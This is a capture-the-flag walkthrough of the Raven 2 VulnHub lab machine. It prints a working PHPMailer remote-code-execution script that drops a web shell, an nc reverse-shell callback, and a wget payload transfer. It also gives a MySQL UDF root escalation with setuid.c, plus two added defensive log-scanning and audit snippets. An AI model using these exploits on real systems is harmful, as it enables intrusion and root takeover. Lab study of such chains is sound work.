VulnHub machine walkthrough: Raven 2

Name

Name: Raven: 2
Release date: 9 November 2018

Download

  • Download: https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23z
  • Download (Mirror): https://download.vulnhub.com/raven/Raven2.ova
  • Download (Torrent): https://download.vulnhub.com/raven/Raven2.ova.torrent

Description

Raven 2 is an intermediate-level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden its web server to keep attackers out. Can you still crush Raven?

Information gathering

Start with nmap

root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.119
Host is up (0.00022s latency).
MAC Address: 08:00:27:A4:D6:91 (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -sV -v -p- 192.168.56.119
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
58132/tcp open status 1 (RPC #100024)
root@kali:~# nmap -A -v -p 22,80,111,58132 192.168.56.119 --script=vuln -T4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.119
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.119:80/
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.56.119:80/service.html
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.56.119:80/contact.php
| Form id: myform
| Form action:
|
| Path: http://192.168.56.119:80/contact.php
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.56.119:80/index.html
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.56.119:80/wordpress/
| Form id: search-form-5e7c8d72d17d7
|_ Form action: http://raven.local/wordpress/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wordpress/: Blog
| /wordpress/wp-login.php: Wordpress login page.
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /img/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /manual/: Potentially interesting folder
|_ /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_http-server-header: Apache/2.4.10 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35360/udp6 status
| 100024 1 35599/tcp6 status
| 100024 1 46931/udp status
|_ 100024 1 58132/tcp status
58132/tcp open status 1 (RPC #100024)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Then nikto

root@kali:~# nikto -C all -h 192.168.56.119
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-6694: /.DS_Store: Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Uncommon header 'link' found, with contents: <http://raven.local/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
+ /wordpress/: A Wordpress installation was found.

The site is built on WordPress. Add raven.local to /etc/hosts on Kali and to the Windows hosts file.
Scan the site with DirBuster using the medium wordlist and see what turns up.

Flag1

There is a PATH file under /vendor that contains the first flag.

flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}

PHPMailer < 5.2.18 remote command execution

It looks like the site also uses PHPMailer 5.2.16.

PHPMailer versions before 5.2.18 are vulnerable to remote command execution.

Write a bash script for this, using curl as the main driver of the exploit.

exploit.sh

#!/bin/bash
TARGET=http://raven.local/contact.php

DOCROOT=/var/www/html
FILENAME=backdoor.php
LOCATION=$DOCROOT/$FILENAME

# Submit the contact form. The crafted sender address carries sendmail
# options (-oQ queue directory, -X log file) so that the mail log, which
# includes the message body, is written to LOCATION; the body is the PHP.
STATUS=$(curl -s \
  --data-urlencode "name=Hackerman" \
  --data-urlencode "email=\"hackerman\\\" -oQ/tmp -X$LOCATION blah\"@badguy.com" \
  --data-urlencode "message=<?php echo shell_exec(\$_GET['cmd']); ?>" \
  --data-urlencode "action=submit" \
  $TARGET | sed -r '146!d')

# Line 146 of the response carries PHPMailer's 'instantiate' error text when
# the mail call was reached.
if grep 'instantiate' &>/dev/null <<<"$STATUS"; then
  echo "[+] Check ${LOCATION}?cmd=[shell command, e.g. id]"
else
  echo "[!] Exploit failed"
fi

Run the script

root@kali:~/vulnhub/raven2# ./exploit.sh 
[+] Check /var/www/html/backdoor.php?cmd=[shell command, e.g. id]

After that, commands run successfully, as shown below

view-source:http://raven.local/backdoor.php?cmd=whoami

Low-privilege shell

Use nc's -e option to get a reverse shell with low privileges.

view-source:http://raven.local/backdoor.php?cmd=nc%20192.168.56.102%205566%20-e%20/bin/bash
root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
connect to [192.168.56.102] from raven.local [192.168.56.119] 44985
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Raven:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Raven:/var/www/html$ whoami
whoami
www-data

We now have a low-privilege shell.
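As an added defender-side example (not from the original write-up), the Python below scans Apache access-log lines for the two traces the chain above leaves behind: requests to a PHP file that is not part of the deployed site, and a `cmd`-style parameter carrying a shell command or a reverse-shell callback such as the nc line used here. The constructed log lines, the KNOWN_PHP allowlist and the parameter names are assumptions for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines modelled on the walkthrough's requests
# (client IP, timestamps, sizes and user agents are made up for the example).
SAMPLE_LOG = """\
192.168.56.102 - - [26/Mar/2020:03:40:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.56.102 - - [26/Mar/2020:03:41:12 +0000] "POST /contact.php HTTP/1.1" 200 311 "-" "curl/7.64.0"
192.168.56.102 - - [26/Mar/2020:03:42:05 +0000] "GET /backdoor.php?cmd=whoami HTTP/1.1" 200 9 "-" "Mozilla/5.0"
192.168.56.102 - - [26/Mar/2020:03:43:30 +0000] "GET /backdoor.php?cmd=nc%20192.168.56.102%205566%20-e%20/bin/bash HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.102 - - [26/Mar/2020:03:44:00 +0000] "GET /contact.php?cmd=help HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# PHP entry points the deployment is known to ship (assumed allowlist);
# any other .php under the docroot is unexpected.
KNOWN_PHP = {"/contact.php", "/wordpress/index.php", "/wordpress/wp-login.php"}
# Parameter names typical of one-line webshells, and tokens that look like a shell command.
SHELL_PARAMS = {"cmd", "c", "exec", "command"}
SHELL_HINT = re.compile(r"(^|[\s;|&])(nc|ncat|bash|sh|python|perl|whoami|id|wget|curl)\b")
CALLBACK = re.compile(r"\b(nc|ncat|bash)\b.*\d{1,3}(\.\d{1,3}){3}")

def analyse_line(line):
    """Findings for one combined-log line; empty list when nothing looks wrong."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    findings = []
    if url.path.endswith(".php") and url.path not in KNOWN_PHP:
        findings.append(f"unexpected php file {url.path}")
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name.lower() not in SHELL_PARAMS:
            continue
        for value in values:  # parse_qs has already percent-decoded the value
            if SHELL_HINT.search(value):
                findings.append(f"shell command in {name}: {value}")
            if CALLBACK.search(value):
                findings.append("possible reverse shell callback")
    return findings

def scan_log(text):
    """Map line index -> findings for every suspicious line of an access log."""
    report = {}
    for i, line in enumerate(text.splitlines()):
        findings = analyse_line(line)
        if findings:
            report[i] = findings
    return report
```

The harmless `contact.php?cmd=help` line is left alone, so the allowlist and the shell-token check work together rather than flagging every `cmd` parameter.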

Flag 2

The second flag is in www-data's home directory.

www-data@Raven:/var/www$ ls
ls
flag2.txt html
www-data@Raven:/var/www$ cat flag2.txt
cat flag2.txt
flag2{6a8ed560f0b5358ecf844108048eb337}

Flag 3

Use find to locate flag3.

www-data@Raven:/var/www$ find / -type f -name 'flag[3-4].*' 2>/dev/null
find / -type f -name 'flag[3-4].*' 2>/dev/null
/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png

Open it in the browser

http://raven.local/wordpress/wp-content/uploads/2018/11/flag3.png

That gives the third flag.

Privilege escalation

While enumerating the www-data account, I noticed that MySQL runs as root. But because this MySQL is version 5.5, the popular EDB-ID 1518 user-defined function, or UDF, exploit cannot be used.

root       921  0.0 10.1 552000 51240 ?        Sl   01:02   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
www-data@Raven:/var/www$ dpkg -l | grep mysql
dpkg -l | grep mysql
ii libdbd-mysql-perl 4.028-2+deb8u2 amd64 Perl5 database interface to the MySQL database
ii libmysqlclient18:amd64 5.5.60-0+deb8u1 amd64 MySQL database client library
ii mysql-client-5.5 5.5.60-0+deb8u1 amd64 MySQL database client binaries
ii mysql-common 5.5.60-0+deb8u1 all MySQL database common files, e.g. /etc/mysql/my.cnf
ii mysql-server 5.5.60-0+deb8u1 all MySQL database server (metapackage depending on the latest version)
ii mysql-server-5.5 5.5.60-0+deb8u1 amd64 MySQL database server binaries and system database setup
ii mysql-server-core-5.5 5.5.60-0+deb8u1 amd64 MySQL database server binaries
ii php5-mysqlnd 5.6.36+dfsg-0+deb8u1 amd64 MySQL module for php5 (Native Driver)
ii php5-mysqlnd-ms 1.6.0-1+b1 amd64 MySQL replication and load balancing module for PHP

Log in with the MySQL username and password found in wp-config.php.

www-data@Raven:/var/www/html$ grep -A3 -B3 root wordpress/wp-config.php
grep -A3 -B3 root wordpress/wp-config.php
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
  • [Privilege escalation method 1]:

There is a GitHub repository, UDF-Repository-for-MySQL, that hosts many 5.5-compatible UDFs which can be used to escalate privileges. Pick lib_mysqludf_sys, a UDF library with functions for interacting with the operating system.

  • [Privilege escalation method 2]:

Privilege escalation via MySQL remote root code execution

See MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662 for more information.

So search for the UDF dynamic library exploit; in Exploit-DB it is named "1518.c".

exploit-1518

This exploit works by compiling the raw C code into a ".so" file, transferring it to the victim machine, and abusing MySQL to load and run it.
The first step is to compile it.

root@kali:~/vulnhub/raven2/priviligesc# searchsploit 1518
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) | exploits/linux/local/1518.c
root@kali:~/vulnhub/raven2/priviligesc# locate 1518.c
/root/vulnhub/raven1/1518.c
/usr/share/exploitdb/exploits/linux/local/1518.c
root@kali:~/vulnhub/raven2/priviligesc# cp /usr/share/exploitdb/exploits/linux/local/1518.c .
root@kali:~/vulnhub/raven2/priviligesc# ls
1518.c
root@kali:~/vulnhub/raven2/priviligesc# gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc
root@kali:~/vulnhub/raven2/priviligesc# ls
1518.c 1518.so

Transfer the ".so" file to the victim machine's /tmp directory.

root@kali:~/vulnhub/raven2/priviligesc# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.56.1 - - [26/Mar/2020 03:52:25] "GET / HTTP/1.1" 200 -
192.168.56.1 - - [26/Mar/2020 03:52:33] "GET /1518.so HTTP/1.1" 200 -
192.168.56.119 - - [26/Mar/2020 03:52:50] "GET /1518.so HTTP/1.1" 200 -
www-data@Raven:/tmp$ wget http://192.168.56.102/1518.so
wget http://192.168.56.102/1518.so
converted 'http://192.168.56.102/1518.so' (ANSI_X3.4-1968) -> 'http://192.168.56.102/1518.so' (UTF-8)
--2020-03-27 02:52:49-- http://192.168.56.102/1518.so
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19104 (19K) [application/octet-stream]
Saving to: '1518.so'

1518.so 100%[=====================>] 18.66K --.-KB/s in 0s

2020-03-27 02:52:49 (554 MB/s) - '1518.so' saved [19104/19104]

www-data@Raven:/tmp$ chmod 777 *
chmod 777 *
  • Log in to MySQL from the command line and escalate privileges using the vulnerability, the mysql client and the .so file, as shown below
www-data@Raven:/tmp$ mysql -uroot -p'R@v3nSecurity'
mysql -uroot -p'R@v3nSecurity'
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into foo values(load_file('/tmp/1518.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.10 sec)

mysql> create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.00 sec)
  • Escalate privileges and read the final flag4
www-data@Raven:/tmp$ touch lucifer11
www-data@Raven:/tmp$ find lucifer11 -exec "whoami" \;
find lucifer11 -exec "whoami" \;
root
www-data@Raven:/tmp$ find lucifer11 -exec "id" \;
find lucifer11 -exec "id" \;
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
www-data@Raven:/tmp$ find lucifer11 -exec "/bin/sh" \;
find lucifer11 -exec "/bin/sh" \;
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# whoami
whoami
root
# pwd
pwd
/tmp
# cd /root
cd /root
# ls
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
___ ___ ___
| _ \__ ___ _____ _ _ |_ _|_ _|
| / _` \ V / -_) ' \ | | | |
|_|_\__,_|\_/\___|_||_|___|___|

flag4{df2bc5e951d91581467bb9a2a8ff4425}

CONGRATULATIONS on successfully rooting RavenII

I hope you enjoyed this second interation of the Raven VM

Hit me up on Twitter and let me know what you thought:

@mccannwj / wjmccann.github.io

Privilege escalation is complete and flag4 has been read.
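An added example, not part of the original write-up: a small Python audit of the preconditions this UDF chain depends on, run over constructed inputs modelled on what the walkthrough observed (mysqld started with --user=root, an empty secure_file_priv, WordPress connecting as the MySQL root user, and a foreign row in mysql.func). The sample inputs and the EXPECTED_UDFS allowlist are assumptions; the password is redacted.

```python
import re
import shlex

# Constructed inputs modelled on the Raven 2 findings (ps line mirrors the page).
PS_LINE = ("root 921 0.0 10.1 552000 51240 ? Sl 01:02 0:00 /usr/sbin/mysqld "
           "--basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin "
           "--user=root --log-error=/var/log/mysql/error.log --port=3306")
# SHOW VARIABLES values; '' for secure_file_priv means no restriction at all.
VARIABLES = {"secure_file_priv": "", "plugin_dir": "/usr/lib/mysql/plugin/"}
# Rows as `SELECT name, dl, type FROM mysql.func` would return them.
FUNC_ROWS = [("do_system", "1518.so", "function")]
WP_CONFIG = ("define('DB_NAME', 'wordpress');\n"
             "define('DB_USER', 'root');\n"
             "define('DB_PASSWORD', '<redacted>');\n")
EXPECTED_UDFS = set()  # hypothetical allowlist: this deployment needs no UDFs

def mysqld_user(ps_line):
    """Effective mysqld user: --user=<u> from the command line, else the process owner."""
    fields = ps_line.split()
    # `ps aux` columns: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND...
    for arg in shlex.split(" ".join(fields[10:])):
        if arg.startswith("--user="):
            return arg.split("=", 1)[1]
    return fields[0]

def wp_db_user(config_text):
    """DB_USER that WordPress connects with, or None if not defined."""
    m = re.search(r"define\(\s*'DB_USER'\s*,\s*'([^']*)'", config_text)
    return m.group(1) if m else None

def audit(ps_line, variables, func_rows, wp_config, expected=EXPECTED_UDFS):
    """Return the findings that together make the load_file/dumpfile/UDF chain possible."""
    findings = []
    if mysqld_user(ps_line) == "root":
        findings.append("mysqld runs as root: any UDF executes with uid 0 (run it as the mysql user)")
    if not variables.get("secure_file_priv"):
        findings.append("secure_file_priv is empty: LOAD_FILE and INTO DUMPFILE can read and write anywhere")
    if wp_db_user(wp_config) == "root":
        findings.append("WordPress uses the MySQL root account: a web compromise inherits FILE and CREATE FUNCTION")
    for name, dl, _type in func_rows:
        if name not in expected:
            findings.append(f"unexpected UDF '{name}' loaded from {dl}: drop it and inspect plugin_dir")
    return findings
```

Each finding maps to one fix: run mysqld as an unprivileged user, set secure_file_priv to a dedicated directory, give WordPress its own least-privilege database account, and alert on new rows in mysql.func.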

  • [Privilege escalation method 3]:

Still MySQL UDF privilege escalation, but this time using setuid.c.

setuid.c

#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>     /* setuid(), setgid() */

/* Meant to run as a setuid-root binary: raise the ids to 0, then spawn bash. */
int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}

Below are the full MySQL commands; the steps follow [privilege escalation method 2].

create table foo(line blob);
-- raptor_udf2.so is the same library as 1518.so above (Exploit-DB 1518 is raptor_udf2.c)
insert into foo values(load_file('/tmp/raptor_udf2.so'));
-- MySQL 5.5 only loads UDFs from plugin_dir, so the library must be written there
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('gcc -o /tmp/setuid /tmp/setuid.c');
select do_system('chmod u+s /tmp/setuid');
-- \! runs a shell command from the mysql client; the client was started in /tmp
\! sh
./setuid

Once these commands complete you have a root shell.

Key takeaways

  • PHPMailer < 5.2.18 remote command execution
  • MySQL 5.5 UDF privilege escalation (1518.c)
  • setuid.c privilege escalation

Game over

Sorry, this time I still did not find that Greek master's foolproof one-click clear script. I am so sorry about this… It's a pity…

The end, to be continued…